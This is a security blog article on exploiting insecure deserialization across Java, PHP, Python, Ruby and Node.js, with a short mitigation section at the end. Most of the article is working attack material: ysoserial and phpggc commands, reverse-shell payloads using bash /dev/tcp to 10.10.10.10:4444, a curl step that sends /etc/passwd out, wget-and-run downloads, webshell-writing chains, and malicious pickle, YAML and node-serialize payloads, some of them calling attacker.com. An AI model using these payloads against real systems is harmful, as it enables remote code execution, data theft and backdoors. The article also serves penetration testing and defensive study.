JSON and YAML Unsafe Deserialization: Detection and Exploitation

Deep technical analysis of insecure deserialization across Java, PHP, Python, and Node.js — ysoserial chains, pickle RCE, phpggc POP chains, and magic bytes detection.

lazyhackers
Mar 27, 2026 · 20 min read · 6 views

Serialization Fundamentals

Serialization converts an in-memory object graph into a byte stream or string that can be stored or transmitted. Deserialization reverses this process, reconstructing objects from the byte stream. The critical security issue: when the deserializer reconstructs objects, it executes code — constructors, property setters, and lifecycle methods — based entirely on the attacker-controlled input data.

The attack surface exists wherever serialized data crosses a trust boundary: HTTP cookies, API request bodies, message queue payloads, session stores, and inter-service RPC calls. The magic bytes of each format allow rapid identification during black-box testing.

Language/Format Magic Bytes (Hex) Human-Readable Start Common Location
Java Serialized AC ED 00 05 ’.. Cookies, HTTP body, JMX
Python Pickle (v2) 80 02 Binary Flask sessions, ML models
PHP Serialized N/A O:8:"ClassName" Cookies, POST body
Ruby Marshal 04 08 Binary Rails sessions, cookies
Java Base64 N/A rO0AB URL params, JSON fields
.NET ViewState N/A /wEy (base64) ASP.NET __VIEWSTATE

Java Deserialization — ysoserial and Gadget Chains

How Java Deserialization Works

Java's ObjectInputStream.readObject() reconstructs serialized objects by reading the class name and data from the stream. As it reconstructs each object, it calls the readObject() method on classes that define it, and calls finalize(), readResolve(), and other lifecycle methods. A gadget chain exploits the fact that some classes in the JVM classpath perform dangerous operations (like executing shell commands or making network connections) within these lifecycle methods.

// Detecting Java deserialization in HTTP traffic:
// Magic bytes AC ED 00 05 in raw body, or base64-encoded rO0AB...

// Burp Suite detection (in raw request):
// Cookie: session=rO0ABXNyAC5...  <-- base64 Java serialized object
// Body with Content-Type: application/octet-stream
// AMF binary protocol traffic

// Confirming the endpoint deserializes:
// 1. Decode the base64 cookie
echo "rO0ABXNy..." | base64 -d | xxd | head
# 0000000: aced 0005 7372 ...  <-- confirms AC ED 00 05

// 2. Generate DNS callback payload with ysoserial:
java -jar ysoserial.jar URLDNS "http://your-burp-collab.oastify.com" > payload.ser

// 3. Send the payload:
curl -X POST https://target.com/api/endpoint \
  --data-binary @payload.ser \
  -H "Content-Type: application/octet-stream"

// 4. Check Burp Collaborator for DNS hit

ysoserial Gadget Chains

ysoserial is the primary tool for generating Java deserialization payloads. Each gadget chain requires specific libraries to be present in the application's classpath:

# List all available gadget chains:
java -jar ysoserial.jar --help

# CommonsCollections1 — Apache Commons Collections 3.1-3.2.1
java -jar ysoserial.jar CommonsCollections1 'curl http://10.10.10.10:8080/rce' | base64 -w0

# CommonsCollections6 — works on newer Java (>8u71) where CC1/CC3 were patched
java -jar ysoserial.jar CommonsCollections6 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xMC4xMC80NDQ0IDA+JjE=}|{base64,-d}|bash' | base64 -w0

# Spring framework gadget:
java -jar ysoserial.jar Spring1 'touch /tmp/pwned' | base64 -w0

# Hibernate gadget (very common in enterprise Java):
java -jar ysoserial.jar Hibernate1 'id > /tmp/pwned' | base64 -w0

# Groovy gadget:
java -jar ysoserial.jar Groovy1 'wget http://10.10.10.10/shell.sh -O /tmp/s && bash /tmp/s' | base64 -w0

# For cookie injection (base64url encoding, no padding):
java -jar ysoserial.jar CommonsCollections6 'id' | base64 | tr '+/' '-_' | tr -d '='
The CommonsCollections gadget chains are the most common because Apache Commons Collections is used in nearly every enterprise Java application. CC1/CC2/CC3 require Commons Collections 3.x, while CC4/CC5/CC6/CC7 work with 4.x. Always try multiple chains since classpath availability varies.

Full Java Deserialization Exploit Chain

# Target: Java web application with session cookie
# Cookie observed: JSESSIONID=rO0ABXNyAC5qYXZhLnV0...

# Step 1: Extract and identify
echo "rO0ABXNy..." | base64 -d > session.bin
file session.bin
# Java serialization data

# Step 2: DNS callback to confirm blind RCE
java -jar ysoserial.jar CommonsCollections6 \
  'nslookup confirm.attackercollab.oastify.com' > blind_test.ser

curl -X POST https://target.com/api/process \
  -H "Content-Type: application/octet-stream" \
  --data-binary @blind_test.ser

# Wait for DNS hit in Collaborator

# Step 3: Out-of-band data exfiltration (if blind)
java -jar ysoserial.jar CommonsCollections6 \
  'curl -d @/etc/passwd http://10.10.10.10:8080/exfil' > exfil.ser

# Step 4: Reverse shell
# Encode reverse shell to avoid bad characters:
echo 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1' | base64
# YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xMC4xMC80NDQ0IDA+JjE=

java -jar ysoserial.jar CommonsCollections6 \
  'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xMC4xMC80NDQ0IDA+JjE=}|{base64,-d}|bash' \
  > shell.ser

curl -X POST https://target.com/api/process \
  -H "Content-Type: application/octet-stream" \
  --data-binary @shell.ser

PHP Object Injection and POP Chains

PHP Serialization Format

PHP's serialize() function produces a string representation of objects. The unserialize() function reconstructs these objects and calls magic methods during the process:

// PHP serialized string format:
// O:8:"ClassName":2:{s:4:"prop";s:5:"value";s:5:"other";i:42;}
// O = Object, :8: = class name length, "ClassName" = class name
// :2: = number of properties
// s:4:"prop" = string key, s:5:"value" = string value

// Magic methods called during deserialization:
// __wakeup()  — called immediately after unserialize()
// __destruct() — called when object is garbage collected (end of request)
// __toString() — called when object is used as string
// __get()     — called when accessing undefined property

// Example vulnerable code:
class FileLogger {
  public $logFile = '/var/log/app.log';
  public $logData;

  public function __destruct() {
    // Called at end of request — attacker controls $logFile and $logData!
    file_put_contents($this->logFile, $this->logData);
  }
}

// If user-supplied cookie is passed to unserialize():
$data = unserialize(base64_decode($_COOKIE['session']));

// Attack payload — write a PHP webshell:
// O:10:"FileLogger":2:{s:7:"logFile";s:28:"/var/www/html/shell.php";s:7:"logData";s:29:"";}
// Base64-encoded and set as cookie

Building POP Chains with phpggc

phpggc (PHP Generic Gadget Chains) is the PHP equivalent of ysoserial, providing pre-built gadget chains for popular PHP frameworks:

# List available gadget chains:
./phpggc -l

# Chains for common frameworks:
# Laravel/RCE1 through RCE7
# Symfony/RCE1 through RCE7
# Guzzle/FW1 (file write)
# Monolog/RCE1 (log injection)
# Yii/RCE1 (Yii framework)

# Generate Laravel RCE payload:
./phpggc Laravel/RCE5 system 'id' -b
# Output: base64-encoded serialized payload

# File write payload (write webshell):
./phpggc Laravel/FW1 /var/www/html/backdoor.php '' -b

# Guzzle file write (common in APIs using Guzzle HTTP client):
./phpggc Guzzle/FW1 /var/www/html/shell.php '' -b

# Symfony RCE:
./phpggc Symfony/RCE4 exec 'curl http://10.10.10.10/$(id)' -b

# Monolog RCE (very common — Monolog is used in Laravel, Symfony):
./phpggc Monolog/RCE1 system 'id' -b

# With URL encoding for cookie injection:
./phpggc Laravel/RCE5 system 'id' -b | python3 -c "import sys,urllib.parse; print(urllib.parse.quote(sys.stdin.read()))"

Finding PHP Deserialization Points

# In source code, look for:
grep -rn "unserialize(" /var/www/html/
grep -rn "unserialize(base64_decode" /var/www/html/
grep -rn "unserialize(\$_COOKIE" /var/www/html/
grep -rn "unserialize(\$_GET" /var/www/html/
grep -rn "unserialize(\$_POST" /var/www/html/

# Common locations in HTTP traffic:
# Cookies with base64-encoded values starting with "O:"
# Hidden form fields
# API request bodies with base64 blobs
# ViewState-like parameters

# Identifying PHP serialized data:
# Plain: O:8:"stdClass":1:{s:4:"test";s:2:"ok";}
# Base64: TzoxMjoiRmlsZUxvZ2dlciI6...
# URL-encoded: O%3A12%3A%22FileLogger%22...

Python Pickle Deserialization RCE

Python's pickle module is the most dangerous deserialization format because executing arbitrary code is literally by design — the __reduce__ method tells pickle exactly how to reconstruct an object, including calling any Python callable with any arguments:

import pickle
import os

# How a malicious pickle payload is constructed:
class MaliciousPickle:
    def __reduce__(self):
        # Return a tuple: (callable, args)
        # Pickle will call callable(*args) during deserialization
        return (os.system, ('curl http://10.10.10.10:8080/rce &',))

# Serialize it:
payload = pickle.dumps(MaliciousPickle())
print(payload)
# b'\x80\x04\x95...' — binary pickle data

# More flexible: using exec for arbitrary code
class RCEPickle:
    def __reduce__(self):
        cmd = "bash -c 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1'"
        return (os.system, (cmd,))

# Even more flexible: using subprocess
import subprocess
class SubprocessPickle:
    def __reduce__(self):
        return (subprocess.check_output, (['id'],))

# Generating the payload for HTTP delivery:
import base64
payload = base64.b64encode(pickle.dumps(RCEPickle())).decode()
print(payload)  # Send this as a cookie or API parameter

Pickle in Real Applications

# Flask session pickle (older versions / custom session handling):
# If Flask app uses pickle for sessions:
import flask
import pickle
import base64
import zlib

def create_evil_flask_session(secret_key, payload_class):
    """Create a malicious Flask session cookie"""
    data = pickle.dumps(payload_class())
    compressed = zlib.compress(data)
    b64 = base64.urlsafe_b64encode(compressed)
    # Flask signs with HMAC-SHA1 — need the secret key
    # Without secret key, focus on finding the key first

# ML model files (critical infrastructure attack vector):
# joblib.load(), pickle.load() on ML model files is common
# Malicious .pkl file uploaded as "model update"
class MaliciousModel:
    def __reduce__(self):
        return (exec, ("import os; os.system('curl http://attacker.com/ml-pwn')",))

# Save as model.pkl and upload to ML pipeline:
with open('malicious_model.pkl', 'wb') as f:
    pickle.dump(MaliciousModel(), f)

# Detecting pickle deserialization in Python apps:
# grep -rn "pickle.loads" /app/
# grep -rn "pickle.load(" /app/
# grep -rn "joblib.load" /app/
# Look for cookie values starting with \x80\x02 or \x80\x04 (base64: gASV or gAJ)

YAML Deserialization Attacks

PyYAML — load() vs safe_load()

# PyYAML's yaml.load() with Loader=Loader (or no Loader) allows
# arbitrary Python object construction via YAML tags

# Malicious YAML payload for RCE:
yaml_payload = """
!!python/object/apply:subprocess.check_output
- ['id']
"""

# With yaml.load():
import yaml
result = yaml.load(yaml_payload, Loader=yaml.Loader)  # EXECUTES id command!

# More powerful payload using os.system:
yaml_payload_rce = """
!!python/object/apply:os.system
- 'bash -c "bash -i >& /dev/tcp/10.10.10.10/4444 0>&1"'
"""

# Reverse shell via Python object instantiation:
yaml_complex = """
!!python/object/new:type
  args:
  - z
  - !!python/tuple []
  - {'extend': !!python/name:exec }
  listitems: "import os; os.system('id')"
"""

# Detection in source code:
# grep -rn "yaml.load(" /app/
# Safe version: yaml.safe_load() — only allows basic YAML types (strings, numbers, lists, dicts)
# Vulnerable: yaml.load(data) or yaml.load(data, Loader=yaml.FullLoader) in older PyYAML

Ruby YAML and Marshal Deserialization

# Ruby Marshal — binary serialization format
# Rails uses Marshal for session cookies (signed with secret_key_base)
# If secret_key_base is known/leaked, create malicious session:

# Ruby YAML deserialization (CVE-2013-0156 — Rails YAML parsing):
# The famous 2013 Rails RCE — YAML with embedded ERB
yaml_rce = <<~YAML
--- !ruby/object:Gem::Requirement
requirements:
  !ruby/object:Gem::Package::TarReader
  io: &1 !ruby/object:Net::BufferedIO
    io: &1 !ruby/object:Gem::Package::TarReader::Entry
      read: 0
      header: "abc"
    debug_output: &1 !ruby/object:Net::WriteAdapter
      socket: &1 !ruby/object:Gem::RequestSet
          sets: !ruby/object:Net::WriteAdapter
              socket: !ruby/module 'Kernel'
              method_id: :system
          git_set: "id"
      method_id: :call
YAML

# Current Ruby deserialization gadget (universal gadget):
# Using ERB template rendering via YAML:
require 'yaml'
require 'erb'

payload = "---\n- !ruby/object:ERB\n  src: \"<%=`id`%>\"\n"
YAML.load(payload)  # Executes id in modern Ruby versions (CVE-2022-32247)

node-serialize — Node.js Deserialization RCE

The node-serialize npm package (version 0.0.4) contains a critical vulnerability where JavaScript function expressions stored in serialized data are executed via eval() during deserialization:

// node-serialize vulnerability (CVE-2017-5941)
// The serialize() function includes a special marker _$$ND_FUNC$$_ for functions
// During unserialize(), any value starting with this marker is eval()'d

// Malicious payload structure:
{
  "rce": "_$$ND_FUNC$$_function(){require('child_process').exec('id', function(error, stdout, stderr){console.log(stdout)});}()"
}

// Note the IIFE syntax () at the end — this forces immediate execution
// Without (), the function is defined but not called

// Full exploit:
const serialize = require('node-serialize');

// Create payload
const payload = '{"rce":"_$$ND_FUNC$$_function(){require(\'child_process\').exec(\'bash -c \\\'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1\\\'\', function(e,s,r){console.log(s)})}()"}';

// If the application does:
const obj = serialize.unserialize(payload); // TRIGGERS RCE

// Finding this vulnerability:
// Look for: require('node-serialize')
// Look for: .unserialize( or serialize.unserialize(
// Common in: session handling, cookie parsing, data transfer between services

// Generating payload with nodejsshell.py:
python nodejsshell.py 10.10.10.10 4444
// Output: eval(String.fromCharCode(10,118,97,114,...))
// Wrap in: {"rce":"_$$ND_FUNC$$_function(){ PAYLOAD }()"}

Finding Deserialization in HTTP Traffic

Burp Suite Detection Methodology

# Step 1: Set up Burp Collaborator
# Burp Suite Professional > Burp Collaborator > Copy to clipboard
# Your collaborator: abcdef123.oastify.com

# Step 2: Check all cookies for serialized data signatures
# In Burp: Proxy > HTTP History
# Look for base64 cookies, binary cookies, long opaque values

# Step 3: Test each suspicious parameter with URLDNS payload
# Java:
java -jar ysoserial.jar URLDNS "http://$(openssl rand -hex 4).abcdef123.oastify.com" > dns_test.ser
# Base64 encode and inject into cookie

# Step 4: Check Collaborator for DNS hits
# If DNS hit received: Java deserialization confirmed

# For PHP cookies — look for:
# base64 strings starting with: Tzo (O: when decoded)
# URL-encoded strings: O%3A

# For Python pickle:
# Cookies/params with binary data or base64 starting with gASV or gAJ

# Burp extension: Java Deserialization Scanner
# Automatically tests for deserialization vulnerabilities using multiple gadget chains

Identifying Deserialization in Non-obvious Locations

# AMF (Action Message Format) — Flash/Flex applications
# Binary protocol using Java serialization underneath
# Content-Type: application/x-amf

# ViewState — ASP.NET
# Hidden form field: __VIEWSTATE
# Base64 starting with /wEy or /wE
# If not MAC-protected (EnableViewStateMac=false): directly exploitable
# With known machineKey: forge malicious viewstate

# JMX (Java Management eXtensions) — internal monitoring
# Port 1099 (RMI registry)
# nmap -p 1099 --script rmi-dumpregistry target
# Use ysoserial with RMI transport:
java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit target 1099 CommonsCollections6 'id'

# Deserialization in message queues:
# Apache ActiveMQ (CVE-2023-46604 — critical RCE):
# Sends ClassInfo OpenWire command with malicious class URL
python exploit_activemq.py -i target -p 61616 -u http://attacker.com/poc.xml

# Apache Kafka — custom deserializers may use Java serialization
# RabbitMQ — custom message converters

# HTTP headers:
# X-Java-Serialized-Object: base64data
# X-Auth-Token: rO0AB... (Java serialized token)

Blind Deserialization Detection with Collaborator

# For blind scenarios where you don't see output:
# Use out-of-band channels: DNS, HTTP callbacks, time delays

# Java — URLDNS gadget (works without any specific classpath dependency):
java -jar ysoserial.jar URLDNS "http://java-deser-test.YOUR_COLLAB.oastify.com" | base64 -w0

# Python pickle — DNS callback:
import pickle, base64
class DNSCallback:
    def __reduce__(self):
        import socket
        return (socket.gethostbyname, ('python-pickle-test.YOUR_COLLAB.oastify.com',))

payload = base64.b64encode(pickle.dumps(DNSCallback())).decode()

# PHP — using file_get_contents for SSRF callback:
# Build POP chain that calls file_get_contents('http://YOUR_COLLAB.oastify.com/php-deser')

# Time-based detection (when DNS is blocked):
# Java — use sleep gadget:
class TimingGadget:
    def __reduce__(self):
        return (os.system, ('sleep 10',))
# If response is delayed by ~10 seconds: deserialization confirmed

Mitigation Strategies

Language Vulnerable Function Safe Alternative Additional Controls
Java ObjectInputStream.readObject() JSON (Jackson/Gson) with type restrictions SerialKiller filter, Java Agent
PHP unserialize() json_decode() with type checking allowed_classes parameter
Python pickle.loads() json.loads(), marshmallow RestrictedUnpickler class
Ruby Marshal.load(), YAML.load() JSON.parse(), YAML.safe_load() Psych safe_load_file
Node.js node-serialize JSON.parse() with schema validation Remove node-serialize entirely

Java SerialKiller Filter

// Drop-in replacement for ObjectInputStream that whitelist/blacklist classes:
// https://github.com/ikkisoft/SerialKiller

import org.nibblesec.tools.SerialKiller;

// Replace:
ObjectInputStream ois = new ObjectInputStream(inputStream);

// With:
ObjectInputStream ois = new SerialKiller(inputStream, "/path/to/serialkiller.conf");

// serialkiller.conf:
<serialkiller>
  <whitelist>
    <regexps>
      <regexp>com\.example\.myapp\.[a-zA-Z0-9]*</regexp>
      <regexp>java\.lang\.(Boolean|Integer|String)</regexp>
    </regexps>
  </whitelist>
  <blacklist>
    <regexps>
      <regexp>org\.apache\.commons\.collections\.functors\.InvokerTransformer</regexp>
    </regexps>
  </blacklist>
</serialkiller>

PHP — unserialize() with allowed_classes

<?php
// PHP 7.0+: restrict which classes can be unserialized
$data = unserialize($untrusted_data, ['allowed_classes' => false]);
// allowed_classes: false = no classes, only primitives
// allowed_classes: ['MyClass', 'AnotherClass'] = whitelist specific classes

// Better: use JSON entirely and avoid unserialize()
$data = json_decode($untrusted_data, true);
if (json_last_error() !== JSON_ERROR_NONE) {
    throw new InvalidArgumentException('Invalid JSON');
}
Never use unserialize() on user-supplied data in PHP, even with allowed_classes. The safest approach is to never pass untrusted data to unserialize() and redesign the feature to use JSON or a validated schema format instead.

Insecure deserialization remains one of the most critical vulnerability classes because exploitation is often straightforward (send pre-built payload, receive shell) and the attack surface is wide — session cookies, API bodies, message queues, and internal microservice communication all commonly use serialization. The combination of ysoserial, phpggc, and pickle payloads means a skilled attacker needs only to identify the deserialization point and select the appropriate tool.

Reactions

Related Articles